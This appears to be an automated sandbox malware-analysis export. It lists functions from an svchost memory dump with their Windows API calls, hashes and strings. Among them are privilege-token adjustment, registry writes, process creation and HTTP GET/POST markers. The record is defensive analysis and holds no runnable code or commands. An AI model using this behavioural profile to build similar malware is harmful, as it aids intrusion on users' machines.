Instruction ID: a01792cefce5224b30663ac04b15098e940fb0ae095bcac7eae3697e97ff3402
Opcode Fuzzy Hash: 55f7fcb63cf07257b6c9cfbab15f5b982165def4249c279ba458bd28b637193d
Instruction Fuzzy Hash: 86210672D4021DBFDB219F94DD85EEEFB7CEB04685F0045A6FE01A2250D7318E649BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F739E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,02F71210,?,02F771F0,?), ref: 02F739F4
OpenProcessToken.ADVAPI32(00000000,?,02F71210,?,02F771F0,?), ref: 02F739FB
LookupPrivilegeValueA.ADVAPI32(00000000,02F771F0,02F71210), ref: 02F73A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02F73A36
CloseHandle.KERNEL32(?,?,?,?,02F71210,?,02F771F0,?), ref: 02F73A41

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: c9cf8afe32a4bba5cb87fcf35e134d0d93c8a2ff92888e895564f0f7e1a735dc
Instruction ID: fb70a9dcaeb1fae6305c6239a064578a05ab6527c61fc04fd6519752cae28d2a
Opcode Fuzzy Hash: c9cf8afe32a4bba5cb87fcf35e134d0d93c8a2ff92888e895564f0f7e1a735dc
Instruction Fuzzy Hash: FFF01D76D10118BBDB20AA95DD0DDAFFFBCEB89B50F000559B905E2100D7708A18DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02F74794 Relevance: 15.1, APIs: 10, Instructions: 143filesleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02F74830
CreateEventW.KERNEL32(02F762B8,00000000,00000000,?), ref: 02F74852
CreateFileMappingW.KERNEL32(000000FF,02F762B8,00000004,00000000,00000000,?), ref: 02F74886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02F7489D
SetEvent.KERNEL32(00000000), ref: 02F748D9
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 02F748EC
UnmapViewOfFile.KERNEL32(00000000), ref: 02F748F3
CloseHandle.KERNEL32(?), ref: 02F74903
CloseHandle.KERNEL32(?), ref: 02F74910
CloseHandle.KERNEL32(00000000), ref: 02F74917

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: 60ead8a09822826fc64080f9586488015459edc7b398f06f43730dedf2600ef4
Instruction ID: 4bc70ebd4e52fcad0ef3b35a067c968f51f8cdd9537426e882f70f2618ba9bd9
Opcode Fuzzy Hash: 60ead8a09822826fc64080f9586488015459edc7b398f06f43730dedf2600ef4
Instruction Fuzzy Hash: 5241D7326583999FD321AF549C45FABBBB8FF85790F00081EF689C6181DB70C409CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02F71CD5 Relevance: 12.1, APIs: 8, Instructions: 115memorysleepstringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02F71CFD
RtlAllocateHeap.NTDLL(00000000), ref: 02F71D04

Part of subcall function 02F71F07: wsprintfA.USER32 ref: 02F71F49

lstrcpy.KERNEL32(00000000,00000000), ref: 02F71D2D
GetProcessHeap.KERNEL32(00000000,?), ref: 02F71DF6
HeapFree.KERNEL32(00000000), ref: 02F71DFD
Sleep.KERNEL32(00001388), ref: 02F71E08
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F71E1A
HeapFree.KERNEL32(00000000), ref: 02F71E21

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: ddd1c85d132d809e7c70d494ec445ff1efee65197995fa05e3585a4756b3a63d
Instruction ID: c81f3057aaf38ebafb5059374bf7a19b0611e047efe4d85c41c0280236eafa4a
Opcode Fuzzy Hash: ddd1c85d132d809e7c70d494ec445ff1efee65197995fa05e3585a4756b3a63d
Instruction Fuzzy Hash: 884158719183009FE720AF69D848A1BBBE8FF88794F10492EF699C2150D770D518CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 02F71E38 Relevance: 12.1, APIs: 8, Instructions: 81memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,02F71148,00000009,00000000,02F771E0,00000007), ref: 02F71E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,02F71148,00000009,00000000,02F771E0,00000007), ref: 02F71E67
RtlAllocateHeap.NTDLL(00000000), ref: 02F71E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 02F71E97
CreateThread.KERNEL32(00000000,00000000,02F71F56,00000000,00000000,00000000), ref: 02F71EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,02F71148,00000009,00000000,02F771E0,00000007), ref: 02F71EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,02F71148,00000009,00000000,02F771E0,00000007), ref: 02F71EF3
HeapFree.KERNEL32(00000000,?,?,?,?,02F71148,00000009,00000000,02F771E0,00000007), ref: 02F71EFA

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: a3ed03419360b2f2bcd936fe2fcea9e5ebe91fec1f2c3cbc3643f1cd772a0092
Instruction ID: 9a67ca02002146f326286963ebe7dc8c78cd21808aea17f4b231c7e80d1e0c54
Opcode Fuzzy Hash: a3ed03419360b2f2bcd936fe2fcea9e5ebe91fec1f2c3cbc3643f1cd772a0092
Instruction Fuzzy Hash: 1621A331A0074AAFD7119F74DC88E67FBACFF05698B04892AEA49C6204D770E81CCB60

Uniqueness

Uniqueness Score: -1.00%

Function 02F7598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 02F759D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 02F759E8
RtlAllocateHeap.NTDLL(00000000), ref: 02F759EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 02F75A09
GetProcessHeap.KERNEL32(00000000,?), ref: 02F75A1E
HeapFree.KERNEL32(00000000), ref: 02F75A25
RegCloseKey.ADVAPI32(00000000), ref: 02F75A2C

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: 420707934d45b88f50376cdea6cce375e794d89bab516a5c8e60f61861a5b7aa
Instruction ID: a8852dfd5ba5872feb8248c5624f2c71461ed80be63d43db9f063b3939ec9743
Opcode Fuzzy Hash: 420707934d45b88f50376cdea6cce375e794d89bab516a5c8e60f61861a5b7aa
Instruction Fuzzy Hash: 8731E371A54345AFE720AF248C84B3BB7ACEF49695F04482EFE85CB240E774D805CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02F715D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 02F715E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 02F715FA
RtlAllocateHeap.NTDLL(00000000), ref: 02F71601

Part of subcall function 02F756E6: GetTempPathA.KERNEL32(00000104,?), ref: 02F756F7

Part of subcall function 02F72E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02F72E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F71669
HeapFree.KERNEL32(00000000), ref: 02F71670
GetProcessHeap.KERNEL32(00000000,?), ref: 02F71683
HeapFree.KERNEL32(00000000), ref: 02F7168A

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: 09e352739e0af610f588b1ec96c755637690878d9d66908af104bca0b7af81c1
Instruction ID: e07c880bc6392b5b4f3f321a81338ac8582e6527c5d7133f5d830ea7b003fc80
Opcode Fuzzy Hash: 09e352739e0af610f588b1ec96c755637690878d9d66908af104bca0b7af81c1
Instruction Fuzzy Hash: 37119A72954309BBE7016FA09C49F7BBB6CEB4AB95F08481AFB4986040DBB49418CF75

Uniqueness

Uniqueness Score: -1.00%

Function 02F74E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,00000000,?,?,02F749A2,00000000,00000000,?,00000000,00000000,02F770E8), ref: 02F74E70
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02F74E77
CreateThread.KERNEL32(00000000,00000000,02F74F6B,00000000,00000000,00000000), ref: 02F74EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,02F770E8), ref: 02F74EB6
HeapFree.KERNEL32(00000000,?,00000000,00000000,02F770E8), ref: 02F74EBD
CloseHandle.KERNEL32(00000000,00000000,?,?,02F749A2,00000000,00000000,?,00000000,00000000,02F770E8), ref: 02F74ECD
CloseHandle.KERNEL32(00000000,?,00000000,00000000,02F770E8), ref: 02F74EDF

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: 78a3e059650d3879ee5d4f255b921b29782c1426ac4fb13bd8db10dbc98b7131
Instruction ID: 38af0717e6106c244e3bfc9e963a8125eef4c3a8af85cd4b894e25142fb3fa83
Opcode Fuzzy Hash: 78a3e059650d3879ee5d4f255b921b29782c1426ac4fb13bd8db10dbc98b7131
Instruction Fuzzy Hash: 9C11E532F5532567E7215F745C0CB27FB6DAF49AE1F054916FB41DB188C7A0C81487A0

Uniqueness

Uniqueness Score: -1.00%

Function 02F758A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02F72EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02F72D76,?,?,?,?), ref: 02F72ED5

memset.MSVCRT ref: 02F758E2
lstrcpyW.KERNEL32(?,02F763B4), ref: 02F7590D
lstrcatW.KERNEL32(?,02F7764C), ref: 02F7591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02F7593B
ExitProcess.KERNEL32 ref: 02F75946

Strings

D, xrefs: 02F758EA

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 5655d6eabad0450dba90b29a3e5a77d74c6ad4ebb606ed3e2add20f8b9e841b6
Instruction ID: 79c8e74ceaeca47e1419cf6f8e8b2e92d071b559a485bb8be3359108fc39a544
Opcode Fuzzy Hash: 5655d6eabad0450dba90b29a3e5a77d74c6ad4ebb606ed3e2add20f8b9e841b6
Instruction Fuzzy Hash: F5112AB290020CAFDB10AAA4DC09FEAB7BCAB44755F004466FA09D6144E7349A188B64

Uniqueness

Uniqueness Score: -1.00%

Function 02F73BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02F73BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 02F73C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 02F73CB5
HeapFree.KERNEL32(00000000), ref: 02F73CEB
HeapFree.KERNEL32(00000000), ref: 02F73D00

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: 63a4e0a21d33bdf92686231d9f860805a6d2e330afe311ebc73f0ec462fd7c6a
Instruction ID: a31cf2f9441d0f4cfd2e8c7dbddbc1fdc2645df3eb8cb5a03a0d89973f6e9e7f
Opcode Fuzzy Hash: 63a4e0a21d33bdf92686231d9f860805a6d2e330afe311ebc73f0ec462fd7c6a
Instruction Fuzzy Hash: AE31B271B58359BFE7209A649C48F7BBADCFF44BC5F04085ABB46D2040E760D854D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02F75A75 Relevance: 9.1, APIs: 6, Instructions: 92memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,00000001), ref: 02F75ACA
RtlAllocateHeap.NTDLL(00000000), ref: 02F75AD1
RegSetValueExA.ADVAPI32(?,00000000,00000000,00000003,00000000,?,00000001), ref: 02F75B24
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F75B2F
HeapFree.KERNEL32(00000000), ref: 02F75B36
RegCloseKey.ADVAPI32(?), ref: 02F75B3D

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseFreeValue
String ID:
API String ID: 1659168586-0
Opcode ID: 274ed50b1bbce1e4556cd1440c95e6273b7b6dde52261ed3ae0410615df222c4
Instruction ID: 9c523dfe5b4e1ce85c16aab4b438583dce035d9df7df6c8db93809b54823c757
Opcode Fuzzy Hash: 274ed50b1bbce1e4556cd1440c95e6273b7b6dde52261ed3ae0410615df222c4
Instruction Fuzzy Hash: 4F212732F443585BD3215E789C54B3BFB69DF89AD0F40442AFB819B241DAA0D80987A0

Uniqueness

Uniqueness Score: -1.00%

Function 02F72482 Relevance: 9.1, APIs: 6, Instructions: 71memorystringsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 02F724B4
lstrlen.KERNEL32(00000000), ref: 02F724D7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F72524
HeapFree.KERNEL32(00000000), ref: 02F7252B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F7254C
HeapFree.KERNEL32(00000000), ref: 02F72553

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$ObjectSingleWaitlstrlen
String ID:
API String ID: 2190776780-0
Opcode ID: 7593d7d1c0083b69872dab02fdb89df71c942df58a952865bcc9907c470441c4
Instruction ID: 055444d0a2657f78bd7d7592a60221fa6931aae2ac599e50cbc4a49522220af8
Opcode Fuzzy Hash: 7593d7d1c0083b69872dab02fdb89df71c942df58a952865bcc9907c470441c4
Instruction Fuzzy Hash: 13212472C11209EBEF11DFE0D9487AEFAB9BF04795F20445ADA00A1191D7B44658CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02F738A9 Relevance: 9.1, APIs: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

_vsnprintf.MSVCRT ref: 02F738B8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 02F738D6
RtlAllocateHeap.NTDLL(00000000), ref: 02F738DD
_vsnprintf.MSVCRT ref: 02F738F5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F7390C
HeapFree.KERNEL32(00000000), ref: 02F73913

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process_vsnprintf$AllocateFree
String ID:
API String ID: 3096491335-0
Opcode ID: 7424db11952f24a5691977129b3155c7134114036ef21009ecdbe5bd7c243ff1
Instruction ID: ed2c4c657d025299bd39285c43428ae02e35ea781f74ea93753f772512e98c89
Opcode Fuzzy Hash: 7424db11952f24a5691977129b3155c7134114036ef21009ecdbe5bd7c243ff1
Instruction Fuzzy Hash: BE01DF73A402097BE7006AA4DC04F7BB76DEB446D0F004866FF05C6140E670D915CB71

Uniqueness

Uniqueness Score: -1.00%

Function 02F74423 Relevance: 9.0, APIs: 6, Instructions: 43memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02F730CE,00000000,?,02F730CE,?), ref: 02F74433
GetProcessHeap.KERNEL32(00000008), ref: 02F74447
RtlAllocateHeap.NTDLL(00000000), ref: 02F7444E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000001), ref: 02F74465
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F74471
HeapFree.KERNEL32(00000000), ref: 02F74478

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateByteCharFreeMultiWidelstrlen
String ID:
API String ID: 180588484-0
Opcode ID: 4ec9f73ea5521f4641a6b47b9a16e7d76c48044c100114e89a2ffdc25f9f11a2
Instruction ID: 9698db2d85873121a653c5a88446d477db9f70c0f672443475b1368bf4d35fb0
Opcode Fuzzy Hash: 4ec9f73ea5521f4641a6b47b9a16e7d76c48044c100114e89a2ffdc25f9f11a2
Instruction Fuzzy Hash: 13F06871A55216BFD7211F25AC0CE6BFE7CEFC5B95F018929F945C2014D7708429D760

Uniqueness

Uniqueness Score: -1.00%

Function 02F716FF Relevance: 9.0, APIs: 6, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02F717FB,00000001), ref: 02F71708
GetProcessHeap.KERNEL32(00000008,-0000003F,00000001), ref: 02F71722
RtlAllocateHeap.NTDLL(00000000), ref: 02F71729
ExpandEnvironmentStringsA.KERNEL32(02F7138F,00000000,-00000040), ref: 02F7173B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02F71747
HeapFree.KERNEL32(00000000), ref: 02F7174E

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandProcessStrings$AllocateFree
String ID:
API String ID: 420829650-0
Opcode ID: e9d24622aeafd4f65b05587d44f712d28bb8c5c91f8158e9c93a5ad7a9271494
Instruction ID: 79d4feb8f3a55d957a6d110eab2ba9fe9af2b8c5f7e7398aceca187e52831207
Opcode Fuzzy Hash: e9d24622aeafd4f65b05587d44f712d28bb8c5c91f8158e9c93a5ad7a9271494
Instruction Fuzzy Hash: 4EF0B432F5421967E7212B74BC0CF4BFAADABC9AD1F014825FA49D6144D770C81DC760

Uniqueness

Uniqueness Score: -1.00%

Function 02F73332 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(?,02F760A0), ref: 02F7333C
QueryPerformanceCounter.KERNEL32(?), ref: 02F7334A
RtlLargeIntegerDivide.NTDLL(00000000,?,?,?,00000000), ref: 02F73372
GetTickCount.KERNEL32 ref: 02F7337A

Strings

&%c=%u, xrefs: 02F73332

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: PerformanceQuery$CountCounterDivideFrequencyIntegerLargeTick
String ID: &%c=%u
API String ID: 1708092081-2762644614
Opcode ID: 29388726f4a1f65bbc5e7dd75a24c7673f1c07598b42db6b7be35a1a50a50e08
Instruction ID: 0b0d21780c9b56fa33975f7c5cde3ceb9230202016bafc6ef21c8c81471fbc68
Opcode Fuzzy Hash: 29388726f4a1f65bbc5e7dd75a24c7673f1c07598b42db6b7be35a1a50a50e08
Instruction Fuzzy Hash: 2DF01D31E1010CBBDF20EFE4D845AADFBB9FB48781F044895F615E2150DB31A624DB10

Uniqueness

Uniqueness Score: -1.00%

Function 02F7175D Relevance: 7.6, APIs: 5, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000003B), ref: 02F71784

Part of subcall function 02F716FF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,?,02F717FB,00000001), ref: 02F71708

GetProcessHeap.KERNEL32(00000000,?), ref: 02F7180F
HeapFree.KERNEL32(00000000), ref: 02F71816

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$EnvironmentExpandFreeProcessStrings
String ID:
API String ID: 2748148605-0
Opcode ID: f42abb4543ca0f5371d9f216652131d95b154094de05f2e5a3e2851c97928a56
Instruction ID: 45247437630f96d129acba671e1dc545e4cbd497004732b2e802db1bef1aa6b3
Opcode Fuzzy Hash: f42abb4543ca0f5371d9f216652131d95b154094de05f2e5a3e2851c97928a56
Instruction Fuzzy Hash: CA31D232A0831A9FEB15AF649C04B3BB7E9AF456D1F10042FF685D6144EB70D40ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 02F75348 Relevance: 7.6, APIs: 5, Instructions: 73memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 02F75367
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,02F750BA,00000000), ref: 02F7537D
GetProcessHeap.KERNEL32(00000008,-0000005F,?,?,?,?,?,?,?,?,?,?,00000000,02F750BA,00000000), ref: 02F7538C
RtlAllocateHeap.NTDLL(00000000), ref: 02F75393
lstrcpy.KERNEL32(00000000,?), ref: 02F753A3

Part of subcall function 02F74543: StrStrIA.SHLWAPI(?,?,?,?,02F7712C,02F762E4,02F77224,?), ref: 02F74563

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heaplstrcpy$AllocateProcesslstrlen
String ID:
API String ID: 3287547560-0
Opcode ID: 20d216273ada10c52a2750c1468d3969e4a722e752ed5b5ba9ebf6b4d4e74932
Instruction ID: ac576cd674eda6660abc8b750f6da7a505a7a751fb8e97c44f25a6afa9428b1e
Opcode Fuzzy Hash: 20d216273ada10c52a2750c1468d3969e4a722e752ed5b5ba9ebf6b4d4e74932
Instruction Fuzzy Hash: 24112972E5412DBAAB01FBE4DC05DFFB7ADEA04680B040467FA15D6100EA60E6098BA5

Uniqueness

Uniqueness Score: -1.00%

Function 02F73763 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000009,00000000,?,02F736F0,02F71134,?), ref: 02F7378E
RtlAllocateHeap.NTDLL(00000000,?,02F736F0), ref: 02F73795
_vsnprintf.MSVCRT ref: 02F737AF
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,02F736F0,02F71134,?), ref: 02F737EC
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,02F736F0,02F71134,?), ref: 02F737F3

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree_vsnprintf
String ID:
API String ID: 3135751541-0
Opcode ID: b8eaad0e5f647b824cbc8687a938018c02a8475b36cf4d4812e6329bc200cc69
Instruction ID: b9a48818a18f17708955d5322ded0e9f93ced63f2d7a9ffded8322380c3b47df
Opcode Fuzzy Hash: b8eaad0e5f647b824cbc8687a938018c02a8475b36cf4d4812e6329bc200cc69
Instruction Fuzzy Hash: 8301DB73A4460A7FE7512A74EC05FA7BB6EEF843E0F044865FB14C5144EA31CC269B61

Uniqueness

Uniqueness Score: -1.00%

Function 02F74F6B Relevance: 7.5, APIs: 5, Instructions: 36memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02F74F79
GetExitCodeProcess.KERNEL32(00000000,?), ref: 02F74F84
CloseHandle.KERNEL32(00000000), ref: 02F74F8B
GetProcessHeap.KERNEL32(00000000,?), ref: 02F74FB5
HeapFree.KERNEL32(00000000), ref: 02F74FBC

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$CloseCodeExitFreeHandleObjectSingleWait
String ID:
API String ID: 2978294806-0
Opcode ID: 30136ae85ee3c54f55dee0b6bd310979a65be352ae4dd695f43fde57c9090c10
Instruction ID: 2ba074e47e6fb6d545ed2c40257c5932c41ecd9dea523533751020bf354d5436
Opcode Fuzzy Hash: 30136ae85ee3c54f55dee0b6bd310979a65be352ae4dd695f43fde57c9090c10
Instruction Fuzzy Hash: D6F09032C46129ABEB21AFA0DC08ADEBB78EF057A5F004611FA0596044C7704A158BE1

Uniqueness

Uniqueness Score: -1.00%

Function 02F721C3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,000000FA), ref: 02F72225
GetProcessHeap.KERNEL32(00000008,000006B5), ref: 02F7225A
RtlAllocateHeap.NTDLL(00000000), ref: 02F72261

Strings

f<v, xrefs: 02F723B0

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser
String ID: f<v
API String ID: 1296208442-2911902482
Opcode ID: 7c55f62b82f09d64867bbdd37f43b9fe0530ed0fad969d691950bf5af363f810
Instruction ID: f04f627b093e2b26fbfbd6a841f8412c1f4c846559426743e4a737aebc3d580e
Opcode Fuzzy Hash: 7c55f62b82f09d64867bbdd37f43b9fe0530ed0fad969d691950bf5af363f810
Instruction Fuzzy Hash: 2281CF72908351ABE321DF64DC44A67BBEDAF55384F05086EFE89D3250E734D908CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02F7315E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000), ref: 02F732A2
RtlAllocateHeap.NTDLL(00000000), ref: 02F732AF

Strings

POST, xrefs: 02F731B9
GET, xrefs: 02F731D0, 02F731DC

Memory Dump Source

Source File: 00000015.00000002.3296339935.0000000002F71000.00000020.00000400.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_2f71000_svchost.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: GET$POST
API String ID: 1279760036-3192705859
Opcode ID: d48ea19a26195e2f84bc7a3a71b9155d586698f3429874a8d89c46db6d38b9c9
